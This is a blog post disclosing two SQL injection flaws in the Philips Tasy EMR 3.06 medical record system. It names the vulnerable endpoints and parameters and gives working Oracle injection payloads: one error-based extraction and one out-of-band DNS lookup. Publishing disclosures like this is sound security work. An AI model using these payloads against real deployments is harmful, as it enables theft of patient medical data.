PHILIPS – TASY EMR 3.06 – SQL INJECTION (CVE-2021-39375,CVE-2021-39376)

This post will describe two SQL Injection Vulnerabiltiies in Eletronic Medical Record (EMR), version 3.06 PHILIPS from Philips vendor.


CVE-2021-39375 – getDimensionItemsByCode


In an authenticated way, the attacker identified the parameter “filterValue” in the URL hostname/TasyAppServer/resources/service/WAdvancedFilter/getDimensionItemsByCode is vulnerable to SQL Injection.
The flaw was discovered through the advanced filter functionality within the system, when submetering a malicious character, the recovery returns an error message containing a stacktrace.

URL: hostname/TasyAppServer/resources/service/WAdvancedFilter/getDimensionItemsByCode
Vulnerable Parameter:FilterValue
Request Method: POST
Request Type: JSON
Payload Example: a%' AND (SELECT CTXSYS.DRITHSX.SN(user,(SELECT DISTINCT owner FROM all_tables OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)) FROM dual) like '%a


Sending the malicious payload
Extracting data

CVE-2021-39376 – executaConsultaEspecifico


In authenticated analysis, the attacker identified that the IE_CORPO_ASSIST and CD_USUARIO_CONVENIO parameter in a POST request at the URL https://hostname/TasyAppServer/resources/service/CorCad_F2/executaConsultaEspecifico did not perform the proper character treatment.

hostname/TasyAppServer/resources/service/CorCad_F2/executaConsultaEspecifico HTTP/1.1
Request Method: POST
Request Type: Json
Payload Example:
NOT 0' AND (SELECT UTL_INADDR.get_host_address('') from dual) like '%a


Sendint the malicious OOB payload inside IE_CORPO_ASSIST parameter
Receiving the DNS lookup at burp colaborator client
Publications and References:

3 thoughts on “PHILIPS – TASY EMR 3.06 – SQL INJECTION (CVE-2021-39375,CVE-2021-39376)

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.